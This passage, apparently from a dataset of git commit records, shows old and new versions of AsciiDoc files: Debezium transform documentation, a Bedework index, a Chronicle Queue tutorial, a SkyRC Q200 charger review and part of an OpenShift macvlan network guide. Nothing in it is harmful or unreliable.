configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.source.fields=table,lsn\n----\n\nwill add\n\n----\n{ \"__table\": \"MY_TABLE\", \"__lsn\": \"123456789\", ...}\n----\n\nto the final flattened record.\n\nFor `DELETE` events, this option is only supported when the `delete.handling.mode` option is set to \"rewrite\".\n\n[[configuration_options]]\n== Configuration options\n[cols=\"35%a,10%a,55%a\",options=\"header\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`drop.tombstones`\n|`true`\n|The SMT removes the tombstone generated by Debezium from the stream.\n\n|`delete.handling.mode`\n|`drop`\n|The SMT can `drop` (the default), `rewrite` or pass delete events (`none`). The rewrite mode will add a `__deleted` column with true\/false values based on record operation.\n\n\n|`route.by.field`\n|\n|The column which determines how the events will be routed, the value will be the topic name; obtained from the old record state for delete events, and from the new record state otherwise\n\n|`add.fields`\n|\n|Specify a list of metadata fields to add to the flattened message. In case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>__\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\n|`add.headers`\n|\n|Specify a list of metadata fields to add to the header of the flattened message. 
In case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>__\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\n|`operation.header` DEPRECATED\n|`false`\n|_This option is deprecated and scheduled for removal. Please use add.headers instead. If both add.headers and operation.header are specified, the latter will be ignored._ \n\nThe SMT adds the event operation (as obtained from the `op` field of the original record) as a message header.\n\n|`add.source.fields` DEPRECATED\n|\n|_This option is deprecated and scheduled for removal. Please use add.fields instead. If both add.fields and add.source.fields are specified, the latter will be ignored._\n\nFields from the change event's `source` structure to add as metadata (prefixed with \"__\") to the flattened record. Please no\n|=======================\n","old_contents":"= New Record State Extraction\ninclude::..\/_attributes.adoc[]\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n[NOTE]\n====\nThis SMT is supported only for the SQL database connectors, it does not work with the MongoDB connector.\nSee xref:configuration\/mongodb-event-flattening.adoc[here] for the MongoDB equivalent to this SMT.\n====\n\nDebezium generates data change events in a form of a complex message structure.\nEach events consists of three parts:\n\n* metadata, comprising the type of operation, information on the event source, a timestamp, and optionally transaction information\n* the row data before change\n* the row data after change\n\nE.g. the general message structure for an `update` change looks like this:\n\n[source,json,indent=0]\n----\n{\n\t\"op\": \"u\",\n\t\"source\": {\n\t\t...\n\t},\n\t\"ts_ms\" : \"...\",\n\t\"before\" : {\n\t\t\"field1\" : \"oldvalue1\",\n\t\t\"field2\" : \"oldvalue2\"\n\t},\n\t\"after\" : {\n\t\t\"field1\" : \"newvalue1\",\n\t\t\"field2\" : \"newvalue2\"\n\t}\n}\n----\n\nMore details about the message structure are provided in xref:connectors\/index.adoc[the documentation for each connector].\n\nThis format allows the user to get most information about changes happening in the system.\nThe downside of using the complex format is that other connectors or other parts of the Kafka ecosystem usually expect the data in a simple message format that can generally be described like so:\n\n[source,json,indent=0]\n----\n{\n\t\"field1\" : \"newvalue1\",\n\t\"field2\" : \"newvalue2\"\n}\n----\n\nDebezium provides https:\/\/kafka.apache.org\/documentation\/#connect_transforms[a single message transformation] that crosses the bridge between the complex and simple formats, the https:\/\/github.com\/debezium\/debezium\/blob\/master\/debezium-core\/src\/main\/java\/io\/debezium\/transforms\/ExtractNewRecordState.java[ExtractNewRecordState] SMT.\n\nThe SMT provides three main functions.\nIt\n\n* extracts the `after` field from change events and replaces the original event just with this part\n* optionally filters delete and tombstone records, as per the capabilities and requirements of downstream consumers\n* optionally adds metadata fields from the change event to the outgoing flattened record\n* optionally add metadata fields to the header\n\nThe SMT can be applied either to a source connector (Debezium) or a sink connector.\nWe generally recommend to apply the transformation on the sink side as it means 
that the messages stored in Apache Kafka will contain the whole context.\nThe final decision depends on use case for each user.\n\n== Configuration\nThe configuration is a part of source\/sink task connector and is expressed in a set of properties:\n\n[source]\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.drop.tombstones=false\ntransforms.unwrap.delete.handling.mode=rewrite\ntransforms.unwrap.add.source.fields=table,lsn\n----\n\n=== Record filtering for delete records\n\nThe SMT provides a special handling for events that signal a `delete` operation.\nWhen a `DELETE` is executed on a datasource then Debezium generates two events:\n\n* a record with `d` operation that contains only old row data\n* (optionally) a record with `null` value and the same key (a \"tombstone\" message). This record serves as a marker for Apache Kafka that all messages with this key can be removed from the topic during https:\/\/kafka.apache.org\/documentation\/#compaction[log compaction].\n\nUpon processing these two records, the SMT can pass on the `d` record as is,\nconvert it into another tombstone record or drop it.\nThe original tombstone message can be passed on as is or also be dropped.\n\n[NOTE]\n====\nThe SMT by default filters out *both* delete records as widely used sink connectors do not support handling of tombstone messages at this point.\n====\n\n=== Adding metadata fields to the message\n\nThe SMT can optionally add metadata fields from the original change event to the final flattened record. This functionality can be used to add things like the operation or the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available see xref:connectors\/index.adoc[the documentation for each connector].\n\nIn case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>_\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.fields=op,table,lsn,source.ts_ms\n----\n\nwill add\n\n----\n{ \"__op\" : \"c\", __table\": \"MY_TABLE\", \"__lsn\": \"123456789\", \"__source_ts_ms\" : \"123456789\", ...}\n----\n\nto the final flattened record.\n\nFor `DELETE` events, this option is only supported when the `delete.handling.mode` option is set to \"rewrite\".\n\n=== Adding metadata fields to the header\n\nThe SMT can optionally add metadata fields from the original change event to the header of the final flattened record. This functionality can be used to add things like the operation or the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available see xref:connectors\/index.adoc[the documentation for each connector].\n\nIn case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>_\", depending on the specification of the struct. 
Please use a comma separated list without spaces.\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.headers=op,table,lsn,source.ts_ms\n----\n\nwill add headers `__op`, `__table`, `__lsn` and `__source_ts_ms` to the outgoing record.\n\n=== Determine original operation [DEPRECATED]\n\n_The `operation.header` option is deprecated and scheduled for removal. Please use add.headers instead. If both add.headers and operation.header are specified, the latter will be ignored._\n\nWhen a message is flattened the final result won't show whether it was an insert, update or first read\n(deletions can be detected via tombstones or rewrites, see link:#configuration_options[Configuration options]).\n\nTo solve this problem Debezium offers an option to propagate the original operation via a header added to the message.\nTo enable this feature the option `operation.header` must be set to `true`.\n\n[source]\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.operation.header=true\n----\n\nThe possible values are the ones from the `op` field of the original change event.\n\n=== Adding source metadata fields [DEPRECATED]\n\n_The `add.source.fields` option is deprecated and scheduled for removal. Please use add.fields instead. If both add.fields and add.source.fields are specified, the latter will be ignored._\n\nThe SMT can optionally add metadata fields from the original change event's `source` structure to the final flattened record (prefixed with \"__\"). This functionality can be used to add things like the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available in the source structure see xref:connectors\/index.adoc[the documentation for each connector].\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.source.fields=table,lsn\n----\n\nwill add\n\n----\n{ \"__table\": \"MY_TABLE\", \"__lsn\": \"123456789\", ...}\n----\n\nto the final flattened record.\n\nFor `DELETE` events, this option is only supported when the `delete.handling.mode` option is set to \"rewrite\".\n\n[[configuration_options]]\n== Configuration options\n[cols=\"35%a,10%a,55%a\",options=\"header\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`drop.tombstones`\n|`true`\n|The SMT removes the tombstone generated by Debezium from the stream.\n\n|`delete.handling.mode`\n|`drop`\n|The SMT can `drop` (the default), `rewrite` or pass delete events (`none`). The rewrite mode will add a `__deleted` column with true\/false values based on record operation.\n\n\n|`route.by.field`\n|\n|The column which determines how the events will be routed, the value will the topic name; obtained from the old record state for delete events, and from the new record state otherwise\n\n|`add.fields`\n|\n|Specify a list of metadata fields to add to the flattened message. In case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>__\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\n|`add.headers`\n|\n|Specify a list of metadata fields to add to the header of the flattened message. 
In case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>__\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\n|`operation.header` DEPRECATED\n|`false`\n|_This option is deprecated and scheduled for removal. Please use add.headers instead. If both add.headers and operation.header are specified, the latter will be ignored._ \n\nThe SMT adds the event operation (as obtained from the `op` field of the original record) as a message header.\n\n|`add.source.fields` DEPRECATED\n|\n|_This option is deprecated and scheduled for removal. Please use add.fields instead. If both add.fields and add.source.fields are specified, the latter will be ignored._\n\nFields from the change event's `source` structure to add as metadata (prefixed with \"__\") to the flattened record. Please no\n|=======================\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"351b4cf459d946dfb6cfe316acf93c3d260d5f63","subject":"More notes and small bash fixes","message":"More notes and small bash fixes\n","repos":"Bedework\/bedework","old_file":"src\/main\/asciidoc\/index.adoc","new_file":"src\/main\/asciidoc\/index.adoc","new_contents":"= Bedework Enterprise Calendar System\n:title: Bedework Enterprise Calendar System\n:doctype: standard\n:imagesdir: .\/resources\/\n:toc: left\n:toclevels: 3\n:sectnumlevels: 3\n\n:overview-dir: overview\/\n:admin-dir: administrators\/\n:deployer-dir: deployers\/\n:dev-dir: development\/\n:older-dir: older\/\n\n:sectnums!:\n\ninclude::foreword.adoc[]\ninclude::introduction.adoc[]\n\n:sectnums:\n\n[[overview]]\n== Overview\n\ninclude::{overview-dir}features.adoc[]\ninclude::{overview-dir}release-notes.adoc[]\ninclude::{overview-dir}issues.adoc[]\ninclude::{overview-dir}system-overview.adoc[]\ninclude::{overview-dir}history.adoc[]\ninclude::{overview-dir}standards.adoc[]\ninclude::{overview-dir}technologies.adoc[]\n\n== General Administration\ninclude::{admin-dir}reindex.adoc[]\n\n== Public Administrator Features\ninclude::{admin-dir}addTopicalArea.adoc[]\ninclude::{admin-dir}eventRegistration.adoc[]\ninclude::{admin-dir}subscriptions.adoc[]\ninclude::{admin-dir}authusers.adoc[]\n\n== Deployers\ninclude::{deployer-dir}installing.adoc[]\ninclude::{deployer-dir}installing-quickstart.adoc[]\ninclude::{deployer-dir}deploying-servers.adoc[]\ninclude::{deployer-dir}configure-wildfly.adoc[]\ninclude::{deployer-dir}databases.adoc[]\ninclude::{deployer-dir}elasticsearch.adoc[]\ninclude::{deployer-dir}eventRegistration.adoc[]\ninclude::{deployer-dir}synch-engine.adoc[]\ninclude::{deployer-dir}locations.adoc[]\n\n== Development\ninclude::{dev-dir}todo.adoc[]\ninclude::{dev-dir}caldavtester.adoc[]\n\n[[older-releases]]\n== Older Bedework Versions (3.10 and Prior)\ninclude::{older-dir}releases.adoc[]\n","old_contents":"= Bedework Enterprise Calendar System\n:title: Bedework Enterprise Calendar System\n:doctype: standard\n:imagesdir: .\/resources\/\n:toc: left\n:toclevels: 3\n:sectnumlevels: 3\n\n:overview-dir: overview\/\n:admin-dir: administrators\/\n:deployer-dir: deployers\/\n:dev-dir: development\/\n:older-dir: older\/\n\n:sectnums!:\n\ninclude::foreword.adoc[]\ninclude::introduction.adoc[]\n\n:sectnums:\n\n[[overview]]\n== 
Overview\n\ninclude::{overview-dir}features.adoc[]\ninclude::{overview-dir}release-notes.adoc[]\ninclude::{overview-dir}issues.adoc[]\ninclude::{overview-dir}system-overview.adoc[]\ninclude::{overview-dir}history.adoc[]\ninclude::{overview-dir}standards.adoc[]\ninclude::{overview-dir}technologies.adoc[]\n\n== General Administration\ninclude::{admin-dir}reindex.adoc[]\n\n== Public Administrator Features\ninclude::{admin-dir}eventRegistration.adoc[]\ninclude::{admin-dir}subscriptions.adoc[]\ninclude::{admin-dir}authusers.adoc[]\n\n== Deployers\ninclude::{deployer-dir}installing.adoc[]\ninclude::{deployer-dir}installing-quickstart.adoc[]\ninclude::{deployer-dir}deploying-servers.adoc[]\ninclude::{deployer-dir}configure-wildfly.adoc[]\ninclude::{deployer-dir}databases.adoc[]\ninclude::{deployer-dir}elasticsearch.adoc[]\ninclude::{deployer-dir}eventRegistration.adoc[]\ninclude::{deployer-dir}synch-engine.adoc[]\ninclude::{deployer-dir}locations.adoc[]\n\n== Development\ninclude::{dev-dir}todo.adoc[]\ninclude::{dev-dir}caldavtester.adoc[]\n\n[[older-releases]]\n== Older Bedework Versions (3.10 and Prior)\ninclude::{older-dir}releases.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ee753d5004cdb77de332854c750ef4937b1ea17","subject":"Simple input tutorial","message":"Simple input tutorial\n","repos":"OpenHFT\/Chronicle-Queue-Sample","old_file":"simple-input\/README.adoc","new_file":"simple-input\/README.adoc","new_contents":"= Chronicle-Queue-Sample\n\nFirst open the module `Chronicle-Queue-Sample`.\nGo to the sub-module `simple-input`, then `src`, `main`, `java` and `net.openhft.chronicle.queue.simple.input`.\n\nThis will take you to the `InputMain.java` and `OutputMain.java` Java classes.\nThis is one of the simple demonstrations of how Chronicle Queue can be used.\n\nSelect `InputMain` from the side bar and run `InputMain.java` by right-clicking on the code and selecting `Run 'InputMain.main()'`.\nAfter the code has been run the first time using this method, the green arrow in the top right of the screen can be used to run that code again the next time.\n\nA window at the bottom of the screen will appear with the words `type something`, as the code has instructed it to do.\n\nYou may write anything you wish in this window and press your `Enter` button to submit it.\n\nThe program will then again ask you to `type something`, and again you should type another word.\n\nThis program is set in a loop and will continue to pose this same instruction until it is broken.\nThis is done by not writing anything and leaving the next line blank before pressing `Enter`.\n\nIt is recommended that you type at least three words for the sake of this example.\n\nThe excitement doesn't end here, however.\nYou must then open `OutputMain.java` and run that by right-clicking on the code, the same way you ran `InputMain.java`.\n\nA new window will appear next to the `InputMain` one, simply listing the content you previously entered.\n\nThis demonstrates a program that can store and recall data that is submitted in another place.\n\n","old_contents":"= Chronicle-Queue-Sample\n\nFirst open the module***** `Chronicle-Queue-Sample`. 
Go to the sub-module `simple-input`, then `src`, `main`, `java` and `net.openhft.chronicle.queue.simple.input`.\n\nThis will that you to `InputMain.java` and `OutputMain.java` java classes.***** This is one of the simple demonstrations of how Chronicle Queue can be used.\n\nSelect `InputMain` from the side bar and run `InputMain.java` by right-clicking on the code and selecting `Run 'InputMain.main()'`.\nAfter the code has been run the first time using this method, the green arrow in the top right of the screen can be used to run that code again the next time.\n\nA window at the bottom of the screen will appear with the words `type something`, as the code has instructed it to do.\n\nYou may write anything you wish in this window and your `Enter` button to submit it.\n\nThe program will then again ask you to `type something`, and again you should type another word.\n\nThis program is set on a loop and will continue to pose this same instruction until it is broken.\nThis is done by not writing anything and leaving the next line blank before pressing `Enter`.\n\nIt is recommended that you type at least three words for the sake of this example.\n\nThe excitement doesn't end here, however.\nYou must then open `OutputMain.java` and run that by right-clicking on the code, the same way you ran `InputMain.java`.\n\nA new window will appear next to the `InputMain` one, simple listing the content you previously entered.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8792dece8d62593be1f21c964c6634bb3cd0f042","subject":"Update 2015-04-15-Montar-el-entorno-de-trabajo-adecuado-12.adoc","message":"Update 2015-04-15-Montar-el-entorno-de-trabajo-adecuado-12.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-15-Montar-el-entorno-de-trabajo-adecuado-12.adoc","new_file":"_posts\/2015-04-15-Montar-el-entorno-de-trabajo-adecuado-12.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"048696c7340aaebe4ff0d60884b503256df3fa92","subject":"Update 2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","message":"Update 2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_file":"_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"89184b9781fe3bcd1ff7ec55f4867828e91b1e69","subject":"Update 2016-03-06-Study-plan.adoc","message":"Update 2016-03-06-Study-plan.adoc","repos":"bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io","old_file":"_posts\/2016-03-06-Study-plan.adoc","new_file":"_posts\/2016-03-06-Study-plan.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"418731d5adb2ad5848c3dd8668eaea7a3512218f","subject":"Update 2016-12-22-SkyRC-Q200-Review.adoc","message":"Update 2016-12-22-SkyRC-Q200-Review.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2016-12-22-SkyRC-Q200-Review.adoc","new_file":"_posts\/2016-12-22-SkyRC-Q200-Review.adoc","new_contents":"= SkyRC Q200 - Review\n:published_at: 
2016-12-22\n:hp-tags: SkyRC, Charger, Q200,\nOct\u00e1vio Maia <octaviojmaia@gmail.com>\n\nimage::http:\/\/www.skyrc.com\/image\/data\/980px_en\/Q200\/01.jpg[]\n\n== Introduction \n\nWelcome to my review of the SkyRC Q200 charger. +\nBefore heading further into this review, I\u2019d like to thank Shawn Tong over at SkyRC for making this review possible and Pedro over at Ibermodel for sending the actual unit!\n\n== Overview\n\nLet\u2019s first take a look at the box that the Q200 comes in.\n\n*[BOX PICTURES]*\n\nIt\u2019s a well-built box that has all the information you might need printed on it.\n\n\n*Specifications:*\n\n * AC Input: 100 \u2013 240 V (up to 200W)\n * DC Input: 11 \u2013 18 V (up to 300W)\n * Current: Max. 200mA \/ cell \n * LiPo \/ LiFe \/ LiHV \/ Li-Ion \/ NiMH \/ NiCD \/ Pb\n * Product weight: 1.3 kg \n * Package weight: 2.1 kg \n * Product size (L x W x H): 19.70 x 18.20 x 7.10 cm \n * Package size (L x W x H): 22.00 x 20.00 x 8.00 cm\n * 4 charging ports, each with its own temperature sensor port alongside the corresponding balance port.\n * MicroUSB connector for the PC Link Software\n * USB Power output rated at 5V\/2.1A\n\n== Unboxing\n\nInside the box we'll find the following items:\n\n * SkyRC Q200 Charger\n * Manual\n * 4 x XH balance boards \n * 4 x leads with XT60 connectors (all the XT60 leads come with a plastic holder that makes plugging in your leads much easier. A nice touch)\n * 2 x leads with no connector (useful for making your own connectors, e.g. Deans connector, DC jack, etc.)\n * Power cable\n\n*[ACCESSORIES PICTURES]* +\nBut what is the big deal about this new charger from SkyRC? +\nIt\u2019s the latest 4-port charger from SkyRC, making it very useful for charging multiple LiPo batteries at the same time without resorting to parallel boards that can often cause unbalanced cells or other issues. \n\nThis is a very well-built charger, and while it is made of plastic, the finish is very high quality. +\nI rather enjoy the plastic unit instead of aluminum, as it rules out accidentally shorting something on a metal frame.\n\nAll the cables are made of high quality silicone wire, which is a must nowadays. +\nThe manual is also very well printed and has everything needed in case you are unaware of how the charger works.\n\n\n== Charging\n\n*[BATTERIES CHARGING PICTURES]* +\nThe charger has a power switch, which I consider very useful, and also has two cooling fans, which are very silent while charging but can ramp up quite easily when discharging 4 batteries at the same time. +\nThe Q200\u2019s main advantage over its competition is its compact size and the 4 completely independent charging ports, which can easily be configured to charge different chemistry batteries at the same time, without causing issues to other packs. This is very useful when charging LiPo and Li-Ion 18650 cells. It\u2019s also LiHV compatible, which not all chargers are. +\n\n*[LIPO AND LI ION CHARGING PIC]* +\n\n=== Field Charging\n\nIt also allows for AC input without the need for an external power supply, thanks to its integrated one. It\u2019s also capable of using DC current, which can be useful for field charging with a car battery or even a big LiPo battery. +\n\n*[POWERBANK PIC]* \n\n=== Charging procedure\n\nIt\u2019s a very intuitive charger, and can be controlled like all standard 4-button chargers, with another button to control which channel is selected. 
Everything is displayed on a very nice quality colour screen, with a resolution of 480x320 pixels (sadly this is not a touch screen, but for the price point it's understandable). +\nIt also allows for customizable power outputs between channels A\/C and B\/D when using AC mode. +\nBy default each channel is set at 50W, but can easily be changed. This can be useful if you\u2019re charging a big mAh LiPo battery, like a 5000mAh unit, since you can set appropriate wattage values for charging. +\nOnce you set up the desired wattage on channel B, for example 79W, then channel D will automatically be set to 21W due to the 100W restriction. The same happens on channels A and C.\n\n\nimage::https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io\/blob\/master\/images\/watts.PNG?raw=true[]\n\nChannels A\/C can be used to charge up to 10A, while B\/D can charge up to 5A. +\n\n=== Discharging\n\nDischarge rates are limited to 10W per channel, which for 4S is 0.6A per channel. +\n\n*[DISCHARGE PIC]*\n\n== Extra Features\n\n=== IR Measurement\n\nAlong with standard features like a battery meter, it also supports IR Resistance measurement, which is useful for battery maintenance and tracking. +\n*[IR MEASUREMENT picture]*\n\n=== Bluetooth App\n\nAnother feature of the Q200 charger is that it has its own Bluetooth app for smartphones. +\nFrom what I\u2019ve been able to tell, Bluetooth is always on, although it would be nice if it had an option to turn it off in the settings. +\nAlthough I thought I would rarely use this app, I find it very useful and have come to use it very often. I have set a QR code for LiPo balance charging, which I use often with the app. +\nAll I have to do is scan the QR code and it automatically starts balance charging my 4S LiPo batteries at 1.3A, which is very useful and straight-forward.\n\n*[BLUETOOTH APP]*\n\n=== Device charging\n\nThis device also supports charging any device that can be charged using a USB port. It outputs 5V\/2.1A, which is more than enough for charging your typical smartphone or tablet device. Due to outputting 2.1A it can also charge more power-dense devices, like powerbanks.\n\n*[DEVICE CHARGING]*\n\n== Ending thoughts\n\nWhat can I say about this charger? Is it good enough to recommend purchasing? +\nIn short, yes, definitely!\n\n*Pros:*\n\n\t* Well built.\n * Allows charging up to 4 batteries at the same time.\n * LiHV support.\n * Built-in power supply!\n * Compact size.\n * Supports AC and DC current.\n * Beautiful and intuitive screen.\n * Bluetooth app support.\n * QR Code support.\n\n*Cons:*\n\n\t* No way to turn off Bluetooth (minor complaint here)\n * No touch screen.\n * 200W may not be enough when charging several high-capacity LiPo batteries at 1C.\n\nIf you're interested in purchasing a SkyRC Q200, be sure to reach out to Pedro over at Ibermodel. He'll have one shipped to you at a very affordable price.\n\nEmail: pedro@ibermodel.es +\nTelephone: 945601444 (Spain)","old_contents":"= SkyRC Q200 - Review\n:published_at: 2016-12-22\n:hp-tags: SkyRC, Charger, Q200,\nOct\u00e1vio Maia <octaviojmaia@gmail.com>\n\nimage::http:\/\/www.skyrc.com\/image\/data\/980px_en\/Q200\/01.jpg[]\n\n== Introduction\n\nWelcome to my review of the SkyRC Q200 review. 
+\nBefore heading further into this review, I\u2019d like to thank Shawn Tong over at SkyRC for sending me this charger and making all of this possible!\n\n== Overview\n\nLet\u2019s firstly take a look at the box that the Q200 comes in.\n\n*[BOX PICTURES]*\n\nIt\u2019s a well built box that includes all the information you might need to know printed on the box.\n\n\n*Specifications:*\n\n * AC Input: 100 \u2013 240 V (up to 200W)\n * DC Input: 11 \u2013 18 V (up to 300W)\n * Current: Max. 200mA \/ cell \n * LiPo \/ LiFe \/ LiHV \/ Li-Ion \/ NiMH \/ NiCD \/ Pb\n * Product weight: 1.3 kg \n * Package weight: 2.1 kg \n * Product size (L x W x H): 19.70 x 18.20 x 7.10 cm \n * Package size (L x W x H): 22.00 x 20.00 x 8.00 cm\n * 4 charging ports, each with it\u2019s own temperature sensor port alongside with the correspondent balance port.\n * MicroUSB connector for the PC Link Software\n * USB Power output rated at 5V\/2.1A\n\n=== Unboxing\n\nInside the box we'll find the following items:\n\n * SkyRC Q200 Charger\n * Manual\n * 4 x XH balance boards \n * 4 x leads with XT60 connectors (all the XT60 leads come with a plastic holder that make plugging in your leads much easier. A nice touch)\n * 2 x leads with no connector (useful for making your owns connectors, e.g: Deans connector, DC jack, etc.)\n * Power cable\n\n*[ACCESSORIES PICTURES]* +\nBut what is the big deal about this new charger from SkyRC? +\nIt\u2019s the latest 4-port charger from SkyRC, making it very useful for charging multiple LiPo batteries at the same time without resorting to parallel boards that can often cause unbalanced cells or other issues. +\n\n=== Charging\n\n*[BATTERIES CHARGING PICTURES]* +\nThe charger has a power switch, which I consider very useful and also has two cooling fans, which while charging are very silent, but when discharging 4 batteries at the same time they can ramp up quite easily. +\nThe Q200 main advantage over it\u2019s competition is it\u2019s compact size and the 4 completely independent charging ports, that can easily be configured to charge different chemistry batteries at the same time, without causing issues to other packs. This is very useful when charging LiPo and Li-Ion 18650 cells. It\u2019s also LiHV compatible, which not all chargers are. +\n\n*[LIPO AND LI ION CHARGING PIC]* +\n\n==== Field Charging\n\nIt also allows for AC input without the need for a power supply, due to its integrated power supply. It\u2019s also capable of using DC current, which can be useful for field charging with a car battery or even a big LiPo battery. +\n\n*[POWERBANK PIC]* \n\n==== Charging procedure\n\nIt\u2019s a very intuitive charger, and can be controlled like all standard 4-button chargers, with another button to control which channel is selected. Everything is displayed on a very nice quality colour screen, with a resolution of 480x320 pixels. +\nIt also allows for customizable power outputs between channels A\/C and B\/D when using AC mode. +\nBy default each channel is set at 50W, but can easily be changed. This can be useful if you\u2019re charging a big mAh LiPo battery, like a 5000mAh unit since you can set appropriate wattage values for charging. +\nOnce you setup the desired wattage on channel A, for example 79W, then channel C will automatically be set to 21W due to the 100W restriction.\n\n\nimage::https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io\/blob\/master\/images\/watts.PNG?raw=trueG[]\n\nChannels A\/C can be used to charge up to 10A, while C\/D can charge up to 5A. 
+\n\n==== Discharging\n\nDischarge rates are limited to 10W per channel, which for 4s is 0.6A per channel. +\n\n*[DISCARGE PIC]*\n\n== Extra Features\n\n=== IR Measurement\n\nAlong with standard features like Battery meter, it also supports IR Resistance measurement, which is useful for battery maintenance and tracking. +\n*[IR MEASUREMENT picture]*\n\n=== Bluetooth App\n\nAnother feature of the Q200 charger is that it has its own Bluetooth app for smartphones. +\nFrom what I\u2019ve been able to tell Bluetooth is always on, although it would be nice if it had an option to turn it off in the settings. +\nAlthough thinking I would rarely use this app I find it very useful and have come to use it very often. I have set a QR code for LiPo balance charging, which I use often with the app. +\nAll I have to do is I scan the QR code and it automatically starts balance charging my 4S LiPo batteries at 1.3A, which is very useful and straight-forward.\n\n*[BLUETOOTH APP]*\n\n=== Device charging","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"adf03b5b5c0c6f93ae85f8caf6745ff0aabd2bcc","subject":"Make style changes in CNI content","message":"Make style changes in CNI content\n\n- https:\/\/bugzilla.redhat.com\/show_bug.cgi?id=1708542\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nw-multinetwork-creating-first-attachments.adoc","new_file":"modules\/nw-multinetwork-creating-first-attachments.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/managing_multinetworking.adoc\n\n[id=\"multinetwork-creating-first-attachments-{context}\"]\n= Creating additional network interfaces\n\nAdditional interfaces for Pods are defined in CNI configurations that are stored\nas Custom Resources (CRs). These CRs can be created, listed, edited, and deleted\nusing the `oc` tool.\n\nThe following procedure configures a `macvlan` interface on a Pod. This\nconfiguration might not apply to all production environments, but you can use\nthe same procedure for other CNI plug-ins.\n\n== Creating a CNI configuration for an additional interface as a CR\n\n[NOTE]\n====\nIf you want to attach an additional interface to a Pod, the CR that defines the\ninterface must be in the same project (namespace) as the Pod.\n====\n\n. Create a project to store CNI configurations as CRs and the Pods that will use\nthe CRs.\n+\n----\n$ oc new-project multinetwork-example\n----\n\n. Create the CR that will define an additional network interface. Create a YAML\nfile called `macvlan-conf.yaml` with the following contents:\n+\n[source,yaml]\n----\napiVersion: \"k8s.cni.cncf.io\/v1\"\nkind: NetworkAttachmentDefinition <1>\nmetadata:\n name: macvlan-conf <2>\nspec:\n config: '{ <3>\n \"cniVersion\": \"0.3.0\",\n \"type\": \"macvlan\",\n \"master\": \"eth0\",\n \"mode\": \"bridge\",\n \"ipam\": {\n \"type\": \"host-local\",\n \"subnet\": \"192.168.1.0\/24\",\n \"rangeStart\": \"192.168.1.200\",\n \"rangeEnd\": \"192.168.1.216\",\n \"routes\": [\n { \"dst\": \"0.0.0.0\/0\" }\n ],\n \"gateway\": \"192.168.1.1\"\n }\n }'\n----\n+\n<1> `kind: NetworkAttachmentDefinition`. This is the name for the CR where this\nconfiguration 